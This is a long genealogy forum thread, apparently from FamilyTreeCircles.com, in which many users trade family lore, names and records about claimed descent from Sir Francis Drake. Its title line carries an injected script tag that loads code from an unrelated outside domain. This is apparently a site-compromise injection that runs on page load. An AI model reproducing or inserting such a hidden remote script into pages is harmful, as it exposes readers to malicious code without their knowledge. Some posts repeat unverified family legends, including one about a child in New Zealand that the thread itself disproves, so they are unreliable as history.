Looking for female descendents of Sir Francis Drake<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for female descendents of Sir Francis Drake

Query by Jaxb

My grandfather Harry Taylor was told by his Great Aunt Jane that he was descended from through Sir Francis Drake through a female line. I am trying to fill in the gap between his family and Sir Francis Drake. However, I have been unable to find out whether Drake had children and if so, who they were.

Any ideas?

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by Jaxb Profile | Research | Contact | Subscribe | Block this user
on 2007-12-16 15:01:23

Jaxb , from UK, has been a Family Tree Circles member since Dec 2007. is researching the following names: SIRFRANCISDRAKEANDFEMALED, SIRFRANCISDRAKEANDFEMALED, PLUMB and 5 other(s).

Do you know someone who can help? Share this:


by allycat on 2007-12-23 17:38:20

Dear Jaxb

Hmmm one would imagine there would be much information recorded on this personage. Just by googling I've found these two pages of interest...

Sir Francis Drake : Biography and much more from Answers.com

1st wife: married 1569 Mary Newman she died 12 years after marriage - childless
2nd wife: married 1585 young Aristrocrat Elizabeth Sydenham (20 years his junior)

Francis Drake Biography mentions no children of 2nd marriage and his Title passed to his nephew also named Francis.

This site looks interesting...

The Sir Francis Drake Family

When researching one's genealogy it is always a good idea to prove / disprove the stories we have been told. Sometimes they turn out to be completely false whilst other times they have a grain of truth to them.

To avoid going on wild goose chases - it is best to start with yourself and work backwards when researching the family tree all the while documenting your 'evidence' - Census records - Baptismal entry - marriage - death - burial etc.


by Jaxb on 2007-12-24 09:24:34

Thanks for your comments. I have looked at all those sites, and as you suggested I have begun with myself and worked my way back through the relevant family. It's because I know that Sir Francis Drake had children, and that his heir was his nephew, that I begun to wonder if the family story is incorrect. However, I have a letter written to John Letton Towning in 1851 stating that his line had been acknowleged by the Drake Trustees and added to list of descendents. Unfortunately, I have not been able to get any further in working out how John Towning can trace his line back to Drake (through the female line). I will keep on trying and thanks for your help.

by BruumStyk on 2008-02-01 14:25:12

My greatgrandmother was Ella Drake who was decended from Sir Francis Drake. I have her birth and marriage records. She married James Birch.

by Jaxb on 2008-02-01 15:12:53

Hi BruumStyk and thanks for your message. How was your greatgrandmother descended from Sir Francis Drake as he had no children? Through a sibling? I am intrigued as this must be the same for my family. My line, if it exists which seems doubtful, was back through the Townings, then back to the Hoppings, then the Lettons and I think then probably via Ann Roe who was married to Richard Waldron. Do any of these names feature in your family tree? It was very nice to hear from you.

by Tillymint on 2008-08-13 17:11:54

Jaxb -- any further developments on the Drake female line? I have a Hopping and a Drake, both female, in separate family lines (one collateral). Long shots, I know, but I can't help but wonder. What information do you have on the Hoppings?

by shopper082 on 2008-08-29 22:03:37

i know that i am decended from him too and i was trying to find all this out too so if u find anything out let me know

by Jaxb on 2008-08-30 07:47:52

Hi shopper082. I will let you know if ever I discover the link. With Drake having no children and quite a few siblings I think it will be very difficult to do, but fingers crossed.

by dhileman on 2008-09-01 17:20:13

My Wife of two years and seven months has in here family tree of a Jennie Drake b. November 8th 1866 in Nansfield OH., and died Feb. 22, 1955. She married Charles Carrington Nash Sept. 01, 1887, son of Sumner Lewis Nash and Cornelia Whiting (she has an 1860 first edition of a bible with front page in pen as C. Whiting). Sunmer Lewis Nash was b. Nov. 16, 1864 in Mansfield, OH., and d. Sept. 21, 1934 in Mansfield, OH. Her Mother's maiden name was Cornelia Jane Nash, b. 10/2/1908, Marion OH., My Wife can trace her Nash side back to 1640 thanks to the help of a 1853 published book called the Nash Family or Records of the Descendants of Thomas Nash of New Haven, Connecticut, 1640 by Rev. Sylvester Nash.

She was informed that she was related to Drake but I have found no prove and since he had no children will find no prove.


by Jaxb on 2008-09-02 01:26:06

Hi Dave. Its amazing isn't it how many people have been told they are related to Drake and you're right it can never be direct as Drake had no children. I can only assume that it will be via one of his siblings and in my case a sister. I actually have a solicitors letter dated 1851 that agrees that John Towning has been added to the Drake list of descendents (he was my great great great grandfather or something) but so far I have been unable to work out why this was the case. However, I will not give up as somebody somewhere has the proof.

by FredaDrake on 2008-09-05 09:01:00

We're descended from Elizabeth Drake, Frances Drake's niece. Frances Drake had no children, so all lines are traced back to his nieces and nephews (he had siblings). We still have Elizabeth Drake's sampler hanging on my parents' wall at home.

by Jaxb on 2008-09-05 09:44:42

Hello FredaDrake

How exciting that you are able to trace your line back to Drake's neice. I realise that this will have to be the case for me too and I know its through a female line. Can you help me with this? Do you know the names of Elizabeth's sisters or aunts?

Would be great to hear from you again.

by Aegis on 2008-09-29 18:24:36

Hey Jaxb, could you PM me any results you find? I'm also Drake descendant, although he was on my Grandfathers side from what I'm told.

by Jaxb on 2008-09-30 01:51:55

Hello Aegis

Of course if I find anything I will let you know, but its a very hard search.

by Aegis on 2008-09-30 15:30:38

Thanks a bunch. Yeah I know how difficult it is, it's too bad DNA is obviously out of the question.

If I find anything out myself I'll PM you too.

by Jaxb on 2008-10-01 10:30:37

Thanks Aegis.

by RavenDrake on 2008-10-27 12:37:47

I am a female relation to SFD. Contrary to popular beief, SFD did have at least one child OUT OF WEDLOCK. My fathers family in Florida tell of SFD spending the night with a woman from their clan, getting her pregnant and leaving his leather vest at her dwelling...of which still is passed down in out family. My grandfather has it right now. Naturally our surname was never Drake, but the name Drake has always been a part of someones name all down the generations until just recently. My fathers surname is Price as is mine, but I paln to change it to Drake. If you think SFD had no children, you are DEAD WRONG. PLease refer to my profile and see my new tattoo; the royal Coat of Arms given to SFD by Queen Elizabeth. Feel free to contact me ravendrake2009@yahoo.com

by Jaxb on 2008-10-28 04:06:11

Hello RavenDrake. Great to know you exist. When I say that SFD had no children I am only going on historical fact that he had no children from his two marriages. I have never come across any records of any children born out of wedlock, but I'm certainly not surprised. If you have proof that he had a child out of wedlock you should make sure the Drake Trust have that info as I would imagine that would be a brilliant historical coup for them and wonderful for you.

by FemaleDraker on 2009-01-23 16:18:47

Hello. I am an 8th great neice of SFD, through my maternal grandmother. This was traced through a female who married into his immediate family. I have the lineage in storage... When I was a child, my grandmother always mentioned this with pride (along with being a DD of the first practicing attorney in Boston...) It took her many years to combine info with other relatives, and send/receive letters between uncounted groups. About twenty years ago she sent me a copy. Having moved many, many times - it would take quite a bit to find it, but, it might help other folks looking into it. I didn't know there was much interest in this. I found this link through the Wiki page about SFD, that my husband pulled up ('don't know what inspired that, but, it was a fun read). I guess being an 8th great neice never seemed "important", just interesting - maybe I get a cookie? LOL
E-mail if you really, really, REALLY need me to dig through the catacombs of my storage...

by Jaxb on 2009-01-24 11:15:08

Hello FemaleDraker. How exciting. I would love to see the info you have of course, but I'd feel bad if you had to spend hours searching for it!! However, I think I'd be one of many who would appreciate seeing a copy of it. Who knows I may be able to trace my own line, although at the moment I am clueless as to where the link is. So if ever you do dig it up I'd love to know.

And yes you certainly deserve a cookie!

by rowingrose689 on 2009-02-08 10:18:50

Hi, my family were also told that we were descended from Sir Francis Drake through the female line and for at least 4 generations have carried the name Drake as part of our names.My Grandmothers family certainly came from near Exeter but I've drawn a blank on investigating any further back that 1850s. Has anyone heard of the Drake'Bounty'?

by Jaxb on 2009-02-08 10:39:07

Hello rowingrose689. My family are also from that area. I denthave gone back further than 1850 but no luck in finding that 'link'. However, I think Drake's Bounty might be the Charity funds that were advertise about 1850 and were available to descendents from Sir Francis Drake through the male line (I guess his brothers). My great great great grandfather John Towning applied to the fund and I have a letter from the Exeter solicitor who dealt with his application. Unfortunately we were descended through the female line and received nothing although his name was added to the Drake Register. Also the documentation that John sent off as proof appears to be lost.

by johnnyk777 on 2009-03-11 05:23:45

My Mother-in-law is a female descendent of Sir Francis Drake she is 82 and is in poor health but is a direct descendent

by jaynealison on 2009-04-18 22:00:50

sir francis drake is my 10th great grandfather.

by Jaxb on 2009-04-19 14:02:27

Hi johnnyk777. How is your mother-n-law a direct descendent of Sir Francis Drake? Can she trace her line to one of Drake's siblings?

by Jaxb on 2009-04-19 14:03:45

Hi jaynealison - great to hear from you. How is Sir Francis Drake your 10th great grandfather. I am very interested because as far as history is concerned Drake had no children by either of his marriages. Please let me know as very interested.

by mazzfarrell on 2009-05-02 04:12:14

Hi I am also a related to sir d francis drake through marriage. my father in law was edwin willie drake his father was robert thorp drake his mother was agnes mary ann barton, that is all i can find. i do have robert and agnes marriage certificet and edwins birth certificet. all have past away.francis drake was married tWo times first mary newman 2 elizabeth sydenham sir francis did not have any children, but when he died in 1596 his title past down to his nephew who happend to be named francis also. that is where the related familys come from when it is said we are descendents to sir francis drake, I do have a list of drakes from as early as c1275. it would take to long to put them all up. I do wish you all the best it is hard, i am still looking for all the drak family.

by shanae14863 on 2009-05-04 19:31:32

I am told I am also related to Sir Francis Drake. My great great grandpa Eddie Clausen's mother's name was Jenny Drake, born in 1885, and she was supposed to be his great great niece or something.

by eternity22 on 2009-06-03 00:02:35

My mom told me that we are related to Sir Francis Drake. We dont know how can we related, but his bloodline is in my family. My great-grandma, Olive Drake. Her siblings - Charles "Chuck" Drake and Gladys Drake.

by tayla124 on 2009-06-19 07:09:38

My nana told me that i am a distant relate of sir francis drake i am trying to find as much evidence as i can to surport that and my nana also knows that i have other distat relative, that are also in link with sir fransic drake so if ypu no of any website that can help mehh please can yhoo.

by lorenk2008 on 2009-07-21 16:12:23

Hi. My name is Laurie. I'm adopted and found my biological family about 15 years ago when i was a teen ager. My father told me the only famous person we had in our line was Sir francis drake. My father died about two months ago and lived clear across the country but now i'm trying to find out how that's possible. Starting with yourself is a whole lot harder when you are adopted and everyone is dead.

by martha1796 on 2009-10-05 04:52:16

We have been told that my husbands side is linked to SFD. I am trying to trace the parents of a Martha Drake b abt 1796-1798 who was born in Norfolk. Does anyone know if the Norfolk Drakes are linked with the Devon Drakes.
Any help anyone could give i would really appreciate it.

by Ojaisandy on 2009-10-11 15:46:48

Back in the early 1900's there was a conman named Gustav Anjou who preyed on people interested in their past. He made up genealogies and charged a lot of money for them. If your name was Drake, you can bet you ended up related to SFD. If your name was Scott, Sir Walter definitely was included in your genealogy. And everyone's family genealogy could be traced back to the kings of England and the knights who came over with Wm. the Conquerer. Sadly, the hundreds of books he "created" are in libraries all over the U.S. including the FHL in Salt Lake City. Unsuspecting people read this tripe and get taken in. Everyone's genealogy has been corrupted by this man. Go to Familyhistory.org and do a search of his name in their library. If you find your name, watch out. His work is infamous among genealogists.

by Jaxb on 2009-10-15 09:27:51

Thank you Ojaisandy for your warning re Gustav Anjou. I have never heard from him and found it interesting research looking him up. However, he seems to have mainly tricked wealthy New England Americans and I can't find any record of him getting involved with the Drake family in Devon, England. Still, worth keeping in mind and again thanks.

by RedOctober on 2009-10-17 10:39:03

I too was told we are related to SFD. My grandmother was Dorthy Drake whose father was Charles Drake who also had a son Charles Drake and daughter Elizabeth. My grandmother also had a sister Thelma.

by kimsara on 2010-01-07 12:48:11

Hello everyone my great aunt received part of \drakes \bounty as one of his descendants until her death many years ago. Her surname was Elphick .
I hope this helps

by Jaxb on 2010-01-19 12:11:39

Hi kimsara

So great to hear from you and that someone actually received some of Drake's bounty. My Great Aunt Jane applies for her share as did John Townsend before her, but was told the share was only for lines traced through the male line. I will look into the name Elphick - thanks. Are you in the UK?


by Sunrise1706 on 2010-02-19 14:09:30

Hi, my mother was told we were descended from Sir Francis Drake. My great great grandmother was Elizabeth Drake her family carried the name till she married my great great grandfather Captain George William Sims of Moon Street, Devonport in the 1850s. Elizabeth Drake we were told was a direct descendent of SFD. I have details after the 1840s on my tree but not before this date if this helps anyone.

by Jaxb on 2010-02-20 05:35:36

Hi Sunrise1706 and thanks for getting back to me. Do you have the name of Towning at all in your tree after 1840? Is Devonport in Devon?


by Sunrise1706 on 2010-02-25 13:36:27

Hi Jacki, yes Devonport is in Devon, unfortunately I don't have a Towning in my tree after 1840 (that I know of!). My Elizabeth Drake's son (George William Sims) married an Elizabeth Pascoe (Cornish family) and my family is descended from the cornish area. The Elizabeth Drake in my tree had children George William Sims, Nellie Sims, William Sims, Elizabeth Sims and Jack Sims. This probably doesn't help you but if you should find a link between our trees let me know.

by bisous98 on 2010-03-06 17:56:48

Hey Jaxb, I am also a direct descendent of Sir Francis Drake. My Grandmother's name is Joan Hicks, and her grandmother was the daughter of Francis Drake's Brother. I'm trying to find information too, and I hope this helps.

by cdasher on 2010-05-26 23:16:23

Martha 1976, my tree shows a Martha Johanna William Drake 12-26-1795 daughter of John Hodges Drake, son of James Drake devon 8-8-1725, son of Francis Drake 8-3-1701,son of Banfield Drake, son of Joseph Drake 1708, son of Joan, sister of Sir Francis Drake 9-16 1506? , Son of Thomas Drake, Brother of Sir Francis Drake, Son of Edmund Drake My tree is very large and the print is at times hard to read. I hope this helps though.

by neapierce on 2010-06-14 19:10:39

My grandma has a old old family book that says Sir Francis Drake is my great uncle. I amlooking for all of my lost family and hope I find them...

by neapierce on 2010-06-14 19:39:09

I will be posting pages from this family book and I hope it helps some of you out...

by krissyf on 2010-06-22 21:42:51

I have just started doing my family tree, and found out that my great grandfathers name was Reginald Francis Drake Holmes b.1891 d.1967 apparently named after SFD. His parents were William Henry Holmes 1861-1942 and Blanche Osborn Thompson (D.O.B and death not yet known). My grandmother was told they we are decendents of SFD, but after researching him I too have found he had no children. I am hoping someone might be able to help me make this connection either through a sibling or niece/ nephew or child born out of wedlock as I'm new to this and not yet sure how or where to start looking. Thanks

by maccalenny on 2010-06-30 14:56:21

Re Drake's Charity - there was an annuity of that name paid to the women in my family who carried the Drake name, up till about 1870. It came from the will of a Robert Drake, of LIttleham, Devon, written in 1628. There has been much speculation that he was related to Sir Francis's line of Drakes - I wondered if anyone knows whether there was a link?

by Jaxb on 2010-06-30 15:09:32

Hello maccalenny. So glad to hear from you. Although I don't know if your Robert Drake can be connected to SFD, I do think he might be the link I am looking for in my family. My John Towning 1820 to 1915 is the family member who had a letter confirming that he was entitled to be included in the Drake's Charity, but as he was only entitled through the female line he wouldn't receive anything. The timing is right. I am going to look into this and as all my family were from Littleham, Devon I am hopeful.

Again thanks.

by Woody1202 on 2010-07-13 01:24:27

Hello, I am actually related to Sir Francis Drake also, I have asked my mother about him many times and from what I can remember Francis himself did not have any childen but his 2nd wife had had children after Francis had died and Francis also had many neices and nephews carry on his name. I don't know if this is any help :P

by JazzieGirl9 on 2010-07-22 03:22:22

I am related to Sir Fransis Drake. I forget how, I beleive one of my ansestors married his brother. I can ask my mom and see what info I can get out of her.

by elk_city_2007 on 2010-09-14 21:40:21

In The Secret Voyage of Sir Francis Drake, Samuel Bawlf speaks of a woman, Maria, whom Drake took into his cabin when Drake was exploring the Americas. According to Bawlf, "Apparently it was at this point that Drake also took an interest in a member of Zarate's retinue, a young Negro woman, 'a proper wench called Maria,' who departed with him." She was pregnant when he dropped her and two other slaves off on Francisco Island east Java in 1579.

Could Drake's only direct ancestors descend from Maria? Bawlf seems to suggest that as a possibility.

The book is The Seret Voyage of Sir Francis Drake 1577-1580, by Samuel Bawlf. Penguin Books. ISBN 0-14-200459-6

by MegDrakeRowe on 2010-11-26 14:42:50

Im new on this website and ya I'm descended from Sir Francis Drake. He never had kids but his siblings did. In all of my family generations everbody has the middle name Drake. I have a lot of family in England.

by brongo on 2010-12-29 06:48:07

Hey-I also have been told that I descend from SFD. I have not been able to find much proof but it is interesteing to see how many others are searching. I am sceptical about one aspect however. I read one place that after Drake died and had no direct descendants that there was a dispute over his property in the Americas. Basically, if u had the money, you could buy your lineage from Drake and in turn inheret his land. I am wondering if this has something to do with so many of us thinking that we are descendants and not being able to find any proof. Though I have been unable to spend much time on the matter, I do have a history background and will look deeper into this and let anyone know of any findings.

user edmondsallan deactivated
by Jaxb on 2011-01-04 13:26:18

Thanks for your reply. Is TuT@aol.com the whole address?


by taycourt on 2011-02-05 22:06:57

my last name is Taylor. i am currently researching my family history. i have found in our genealogy that we are ancestors of the drake line. The papers also say through the dark lineage it takes us back to several kings of England.That is all it says. I am not sure yet if the papers mean Sir Francis Drake but that is definitely what it is suggesting. maybe you can help me and i can help you.

by Jaxb on 2011-02-06 08:55:50

Hello taycourt and thanks for your reply. My Taylor connection goes back through Townings and then Lettons as far as I know, but I have not found the missing link because Drake did not have any children. However, Drake is NOT related to any Kings of England.

Are you in the UK? And what kind of papers do you have? Do you have any Townings or Lettons in your family tree?

Speak soon.

by BarbaraEllen on 2011-03-12 10:34:55

I was always told I am a decendent of the sister of Sir F. Drake, Barbara Drake. I was told that a distant cousin possesses her trunk which came across on a ship. I have not seen the trunk, and I am trying to verify if, in fact, he even had a sister named "Barbara". Especially interesting to me since I was named "Barbara". Anyone with info or links, please let me know!!

by pallaci on 2011-05-06 22:07:00

I have always been told I was related to Sir F. Drake by my grandmother who has recently passed away. I have just started searching and am surprised to see he doesn't have any children. Do any of you have any ideas for me to get more information?

by mslinn on 2012-01-27 02:23:47

I, too, have been told I was a decendent of SFD. My Gmother was named Eva Ellen Drake, Her parents were Theadore Drake and Louise Craddock. T. Drakes parents were Samuel A. Drake and Margaret Miller. That is all the info I have. I know at one time my dad had the history back to SFD until the house burned in the late '80's. he said there was one female who would either make us or keep us from being kin to SFD. All family that I could find anything else from have since died.

by Jaxb on 2012-01-27 13:16:08

Thank you very much or contacting me.

by Kylsbaby on 2012-02-22 20:41:10

Well, everyone can add me to the list of people who where told by family that they are connected to SFD

This is what I was given by an "elder" of my family
Mary Ann DRAKE b1742 "m" Henry Williams
Mary's parents are
William John Drake b1692 'm' Jennifer Berriman
Williams parents are
Francis DRAKE c1658 'm' Phillipa Jewell (daughter of John)
Francis's Parents were
Humfidus DRAKE c1625 'm' Phillippa Burnard

it is said that they are all from Cornwall, and some from Calstock in Cornwall.

Henry Williams was in the Navy and their decendants (surname COX) all went on to be Navy Men, Admirals, Sergeons and Navigating Lieutenants.

does this ring a bell with anyone??

Like everyone else I would like to clear up the mystery.

K Hillery
Qld, Australia

by loosie on 2012-02-28 16:26:43

Hello! I see the Drake's got their family on! LOL As a child, I was told we were descendants of the SFD Family. Yes, we all know SFD didn't produce a child with either marriage. However, I find it hard to believe a mistress of any genre race or creed would produce one. At this point in history, much of the marriage was to produce an heir, a member of the family that would carry on the name. So why would SFD have a child out of wedlock of he was married, and not with his wofe. Was she really that ugly? Okay, seriously I am writing here because we all know there is an issue with SFD siblings. There were a supoosed 11 and perhaps one was a sister? Woe. That's a lot of boys! Has anyone ever been able to find any names? I know Thomas was his elder brother. There was at least a John. And my info tells me, half the issue might be bc some of them had the same first name, perhaps a different second. I mean, Sir left his will to a Francis, his nephew and his dad didnt have his name? We all know about patroymic names. Named after the father, so coulkd well be the middle or last name. Scandinavia does it. Sweden, all boys names end in "sson" it translates Son of. And the prefix is always the fathers name. So Karlsson: Son of Karl http://www.algonet.se/~hogman/Naming%20practice_eng.htm
Could this practice be true of Englad? Of course! This has gone on since anyone could read Sanskrit and before. So, yet again, we have to think outsie the box.
But I am here because there is discrepacies in the Drake family name. There was Sir Francis Drake, first Englishman to circumnavigate the world via ship. he was obviously knighted by QE. And rightfully so. He died of dysentery aboard. He was smart to leave a will, but not to leave a lot of his ancestry, and I believe bc he chose not to (from what I have read here and there). Okay, I think I have out in my 2 cents worth. I am more curious about if we all are really direct related to SFD. Or we are House of Drake. I'd be sad, but I believe even the two were like 9th cousins. So, I am related??? through my father. My Maiden name is West, as in dad and granddad. Today I found out my granfather's mom was Jewish. We were never told. I can tell by her name Polak, and her parents, Moses, Bronhorst, etc. it may be German, but Germany and Poland and Russia, eastern Europe all have ties to that. In fact, we were never even told of German! This makes this website amazing.Back when, it was taboo to marry in different faiths. But his proves it. Thats paternal side. Maternal side, a Sicilian w bolnde hair and blue eyes married a French Canadien with dark features. That's what makes us so diverse. My dads maternals hail from Ireland. We havent gotten there yet, but Im hoping to trace back to a magicial leprechaun who gives me that pot o' gold (which I can cash in at 1500 an oz now LOL) :) If anyone is interested, I will provide all the info I can and perhaps it will help you, if you do the same. We found a name Grewell. My mom says it is Jewish, which didnt seem to jive. perhaps Im am an 1/8 Jewish? Id welcome it! But looking it up, i am finding its more a derivative of being French. Take that back now, I went in a rewrote. We can only date back so far. Im hoping if anyone recognizes a surname, would they please contact me at loosiemagoosie@aol.com. Im going to do my best to copy and paste, but I have a feeling it wont work. If anyone wants to know my grandfathers and dads and his parents names, Id love it! Ancestry is great. I dont meant to make light of anything. It's just in this day and age, I would rather a smile.

by haydn185 on 2012-04-16 06:03:52

Hi, I have a faimly tree dating back to Sir Francis Drake and past, my mother is on it and myself. My mother it is told was left a christening dress, to the first baby girl directly linked (how true not sure) but I can clearly see the trace back to her family, which she wore as a baby. Our copy was reproduced by my dad, lots of info.

by Jaxb on 2012-04-16 10:12:48

Hi Kylesbaby - the Drake family were a Devon family, although some of their relatives may have moved to Cornwall. I don't reoognise any of your names, but its nice of you to list them and I will investigate.

Loosie, I imagine Drake didn't have any children because maybe he wasn't able to rather than he had ugly wives. Any descendents will have to be related from a sibling or a bastard child of a mistress (but no record of any bastard children either). I would love to know some of your family names - who knows I might recognise some.

Lastly haydn185 your family tree sounds brilliant. Lucky you. Where did your Dad get hold of this tree, or put it together? Have you got any names on like the following?

Thanks all of you.

by Haley_Alyssa on 2012-06-22 17:56:52

I'm related to him too. Actually just 2 days ago I was over at my great grandpa Dan's house and I found some records. My GG Dan had a brother named Harold I believe, and I think my might be your grandpa. If thats the case, then his moms name was Daisy Fields (Taylor) and her moms name was Daisy too (I think). I'm at a dead end there, so maybe we can work together to find out more? :)

by Jaxb on 2012-06-22 19:05:53

Hi Haley Alyssa. My grandad Harry Taylor was an only child after his older brother died at the age of 13, and then he was orphaned. His mother Louisa died young and he was brought up by two of his great aunts in Exmouth.
Thanks for contacting me though.

by lianekae on 2012-07-12 12:41:42

I, also, have been told all my life I was related to Sir Francis Drake. My grandmother's surname was Drake. I believe a aunt of mine did some work on a family tree and traced it back to SFD, but I have never seen the proof. She has since died, and I would like to know if this is true or not. Anyways, it's kind of fun to think of all these people with the same family story passed down from generation to generation.

by jolockey1970 on 2012-12-20 13:51:22

My mother mentioned the other day that i am also related to SFD as his brother is a relation of mine through my great grandmothers side. my mum found out when she was a child at school from her aunty Joyce , but she has died since so dont know any information other than my great grandmothers name is Ellen Noys, my GGM was french or half french, that is all i know xx

by buddys121 on 2013-04-28 02:55:00

sir francis drake had an illagitamate child to another women when he was married, her name was charity drake and she was on the ship when he came to new zealand. charity met a maori man while in new zealand, my grandmother is decended from charity drake. shes a brooks. ive only just stared by reaserch into my ancestry but my elders would have alot of information, i should just talk to them about it. Buddy nikara

by buddys121 on 2013-04-28 03:03:29

that is the story that has stayed with my mothers family. there are no old papers about it because information passed orally but there is a family tree that is held by some of my elders

by robletch on 2013-05-04 22:14:28

how could sir francis drake father a child in new zealand in the 1500s when new zealand wasnt 'discovered'until the late 1700s? unless the pregnancy lasted 200years? or a miracle .whoever spun that one must have been a right spieler.sorry but i just had to say something. lts hysterical.furthermore at the age of 7 he moved to upchurch in kent where his father was the vicar,as a boy he worked on a little boat up and down the river medway with an old man who left him the boat when he died.he sold the boat and went off to sea with his hawkins cousins when about 13.his favourite drinking hole was the ship inn at gillingham which overlooks the river medway.its still there and is the oldest pub in gillingham kent and only about 2 mile from upchurch. as his father was a churchman you can check the parish registers or the archbishops(canterbury ) transcripts,or the bishop of rochesters records or the MEDWAY kent uk archives.they may have
records of births etc for later siblings born in this area. i live 100yds from this ship inn.

by Jaxb on 2013-05-05 14:31:23

Sir Francis Drake was a Devonshire man born in Tavistock, Devon, although due to religious persecution the family fled to Kent in 1549. Like robletch says there Francis was apprenticed to a barque master. When the ship master died he bequeathed the barque to Drake. Then at the age of 23 went to sea with his second cousin Sir John Hawkins. He never had children with either of his marriages and there is no proof that he had any children with anyone, certainly not like buddys121 says. I think any family relationship, if ever found, will be via a sister of Drake or by relationship to his nephew Francis.

by elkcity on 2013-11-15 22:38:48

The only child Francis Drake may have possibly had would have been from the African woman Maria whom he took into his cabin on his voyage along the American Pacific Coast in the late 1570s. Drake's men all said she was "by far the most beautiful woman they had every beheld." Neither of Drake's two wives bore him a child. The first died before Drake and the other survived Drake who died from an apparent intestinal ailment and was buried at sea.

Drake left Maria and two other Africans on Francisco Island (named for one of the African men) east of Java. Maria quite possibly bore Drake's son there and the line could well have continued.

Source: Samuel Bawlf. The Secret Voyage of Sir Francis Drake. Penguin Publishing. ISBN 0-14-200459-6

by zeh on 2014-01-29 16:57:16

Hi, I've been told I'm related to SFD through the female line from his brother Thomas. It apparently goes:
Thomas's daughter married Ellis Crymes.
They had a son Lewis, who had a son Francis, who had a son Amos, who had a daughter named Honour Crymes. She married Henry Creber and they had a son John, who had a daughter Emmeline. Emmeline's son Percy Ware was my great grandfather. He was a warrener near Sheepstor on Dartmoor. I got all this info as some Australian relatives spent a lot of time researching our family tree, before the days of ancestry.com!

by Jaxb on 2014-01-29 18:04:49

Hi Zeh. Thanks for our reply and the info - sounds very promising. I think that this will be how my family are related to SFD too. Not worked out how yet. However,my family are all from Devon and that part of Devon. Some of my family names are Letton, then Hopping, Towning, Gosling,then Taylor. Any of these names in your tree?

by buddys121 on 2014-09-09 03:19:54

Sir francis drake had an illagitimate daughter who married a brooks. My family is decended from charity drake. Ts sad coz it cant be proven and this only exists in our family

by wood23 on 2014-12-09 16:21:39

Hi Jaxb, I have been told for years that somewhere along the line my grandmother is a descendant of SFD. With the maiden name Taylor also?

by Cdrake on 2015-05-14 13:47:08

Any new Info of this my name is Charity Drake I Was told also that I am a direct Descendent My grandfather Was George Barton Drake And His father was Charles Drake and Mother was Gladys Drake but if he didn't have children IDK why we would be.

by RavenDrakeGerard on 2015-07-03 03:03:18

My fathers family is from Florida. I have checked and yes there was Spanish settlers in Florida as early as the mid 1500's. My Dads family have handed down the story of how a Spanish "harbor prostitute" from our family tree had Sir Francis Drake spend the night with her in her home, while he was visiting some port in what was to become Florida. He apparently left in a hurry, because he left behind his vest, which was adorned with his new coat of arms given to him by Queen Elizabeth. This vest was handed down through the family all these generations, and the last time it was seen, it was inside a plexi-glass cube or box. Sadly I do not know my Dads family and I live in Oregon, so I have never got to see it. The story goes that the woman was impregnated by Drake that night, and had a healthy child who passed down the vest through the family tree up to this day. That's how Drake actually DID have at least one child. Of course its not in the history books!

by Jaxb on 2015-07-03 08:50:23

Hi Cdrake - thanks for your comments. However, Sir Francis Drake did NOT have any legitimate children. Neither of his two wives produced any children, that is an historical fact. Probably loads of illegitimate children.

by Jaxb on 2015-07-03 08:53:14

Hi RavenDrakeGerard. What an amazing story and totally expected of such a man on his travels. What a shame you didn't get to see the vest. Do you know where it is now? I am sure that Drake had numerous illegitimate children and that I am descended from one of them - I just can't find out which one and how. Such an intriging puzzle.

by Jaxb on 2015-07-03 09:18:40

Hi Tillymint, I don't know how I missed your comments and apologise for not replying back when you wrote. I hope you get this. I am so intrigued by you having a Hopping in your family lines, as this is the family I am convinced takes the link back to Drake. Ann Letton born 1769(also known as Nancy Perriam) married Edward Hopping in 1788. Both Ann and Edward both went to sea first on HMS Crescent then the 74-gun Orion under Rear Admiral Sir James Samarez with Edward and William (her brother). Both were present at the Battle of St Vincent and The Nile where she served as a powder monkey. Ann remained at sea until Edward died (she remarried John Perriam). Their daughter Luisa married Henry Towning and had 6 children, one of whom John had this letter concerning his Drake lineage. I trace my line from John's daughter Pamela. As these are all Devonshire families and Drake was a Devonshire squire before his SIR days, I think going backwards from Ann Letton is the most likely way to go. I have gone back to 1672 with the Lettons. I hope this helps. Just an extra note - Nancy Perriam is a well known historical figure and can be easily found on the internet.
Hope I hear from you again.

by ArcticFoXX on 2015-10-20 14:31:13

This is so cool to find. I am a direct descendant of Sir Francis Drake First Baronet.Not THE Sir Francis Drake but his nephew, son of Thomas. My father is the grandson of Edwin Drake and my grandmother is Ina O. Drake, she being the last of the Drakes in our line. It would be interesting to know how many cousins I have here!?

by Warawude on 2015-12-14 09:24:42

Hi Jaxb, if the wikitree is correct, then Sir Francis Drake brings us back to kings of England and many in Euro, esp. via Margaret Cole: http://www.wikitree.com/genealogy/Drake-Family-Tree-326.
If you did DNA test, my GedMatch list shows I have 2 persons who match me highly and are the Hoppings.
I have some East Java in my bloodline, with some African in DNA, yet some French and Scott.
If you wouldn't mind, you might like to contact me at warawuder@gmail.com. Hope you reply.

by MWOODLING58 on 2018-01-14 14:22:41

I have been told all my life that my family is related to Sir Frances Drake through his sister Elizabeth Drake. Yet, I keep seeing on sites either he had no sisters and was one of 11 boys or a site will show a picture of his sister with no information about her. I am so frustrated ! The story goes that Elizabeth came on a trip over here and met a relative of mine. When Sir Frances was ready to go home, Elizabeth stayed here to marry my relative.
Again, the frustration goes to sites saying he had no sister to a site that showed "pictures of Drakes sister Elizabeth."
If I can find this information out, it will help me clear up a family question on being related by marriage.
Please if anyone can help !

user MariaColeman deactivated
by Tillymint on 2018-03-29 02:45:17

Hi Jaxb! I sent you a message but not sure if you got it. Wondering if you've made any progress? We may have some ancestors in common.

by Jaxb on 2018-03-29 16:18:31

Hi Tillymint. Yes I got your message and I replied. Re Sir Francis Drake I've given up as the family storty that we are his direct descendents is nothing but a myth. He had no children. Re the Hoppings, I am always keen to know more about them, going backwards via Ann Letton (Nancy Perriman)who married Edward Hopping. While I trace my family onwards via their first daughter Luisa, I can't find anything about their second daughter Sarah.
What ancestors do we have in common.

by GingerJohn on 2020-09-21 09:53:58

Hiya, No idea if this threads still going but my great grandmother was named Sarah Drake. When i was a kid my gran always told me stories that we are related to the Drakes. Sarah was apparently the second youngest of 7 children (2 girls i believe). My dad knows more than me on this.

by GingerJohn on 2020-09-21 10:06:33

by Pincombe12 on 2021-03-15 00:56:45

I’m some what related to Sir Francis but by his brother Thomas from John elford of sheeps tor Devon. When John died I believe his wife married Thomas drake if any one can shed a light be most welcome

by Minn on 2021-03-17 03:52:14

I was told I was a decendent of SFD. I was told around 4 generations back one of my grandmother's had the maiden name Dray. I was told the name had been changed from Drake as they were ashamed of the piracy.

Like the other poster I am located in Ohio as well.

